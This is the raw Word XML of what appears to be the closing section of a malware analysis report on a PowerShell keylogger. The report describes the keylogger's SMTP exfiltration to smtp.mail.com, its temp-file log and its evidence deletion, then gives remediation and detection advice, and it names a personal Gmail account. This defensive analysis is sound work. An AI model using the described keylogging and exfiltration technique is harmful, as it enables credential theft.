    <w:p w14:paraId="1AE8E641" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007525CC">
        <w:t>The script removes the artifact after sending (Remove-Item -Path $Path -force), indicating an attempt to minimize forensic evidence on the host. However, network logs (SMTP session, DNS, connections to smtp.mail.com) and OS forensic artefacts (process parent/creation events, copies) will still be present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D5FDAA" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:r w:rsidRPr="007525CC">
        <w:pict w14:anchorId="007D2ED2">
          <v:rect id="_x0000_i1059" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7371497B" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conclusion / Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1CF515" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Immediate actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF31B24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Do not execute the script.</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> If found on a host, isolate that host immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52651F3A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lastRenderedPageBreak/>
        <w:t>Treat the exposed credentials as compromised.</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> Reset the chaudhariparth454@gmail.com account password immediately and review account sign-in activity (email provider login history / MFA). Revoke any sessions/tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6BC42C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Remove the script from production systems</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> and preserve a copy (read-only) for investigation and IOC extraction. Keep an evidence copy for the incident record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D518622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Search the environment</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> for the same script or copies and for any instances of $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>env:temp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>\keylogger.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> (or similar filenames) being created. Check Windows %TEMP% folders for recent activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B937807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Block or monitor outbound SMTP</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> to smtp.mail.com (and any other SMTP endpoints found in logs) until remediation is complete. Log and review outbound connections on port 587.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43708ECB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Perform host-level forensics</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> on any host where this script was discovered: check process creation logs, scheduled tasks, startup entries, and other persistence mechanisms. Look for parent process that created/runs PowerShell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5022CAF3" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Harden endpoints</w:t>
      </w:r>
      <w:r w:rsidRPr="007525CC">
        <w:t>: enable script-blocking policies (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>ConstrainedLanguage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> or PowerShell execution policies combined with AppLocker/WDAC), enable EDR/behavioral detections for Add-Type/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007525CC">
        <w:t>GetAsyncKeyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007525CC">
        <w:t xml:space="preserve"> usage, and enforce credential hygiene (no plaintext credentials in scripts).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D0B7DF" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:r w:rsidRPr="007525CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Longer-term</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2ADFEC" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007525CC">
        <w:t>Require credential rotation and multi-factor authentication for accounts used by scripts or automated processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADD2884" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007525CC">
        <w:t>Implement outbound mail controls and DLP to detect sensitive data exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21682A3E" w14:textId="77777777" w:rsidR="007525CC" w:rsidRPr="007525CC" w:rsidRDefault="007525CC" w:rsidP="007525CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007525CC">
        <w:t>Educate users about never storing credentials in plaintext and about phishing/social engineering risks that lead to installing persistence scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7444C72B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7C0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4898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85A58"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D7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6326"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC46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A4EBB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="61D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256E8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A1C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34BD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D7F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73549"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D094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70210">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1634671417">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1900632206">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1397051413">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1142774494">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="2068726432">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1052389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5CC"/>
    <w:rsid w:val="000004C0"/>
    <w:rsid w:val="001D23F4"/>
    <w:rsid w:val="003E1337"/>
    <w:rsid w:val="006D5EFD"/>
    <w:rsid w:val="007525CC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1718"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6281D288-D71A-43D9-BDD9-4C143FBF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2025-09-19T02:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-19T02:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>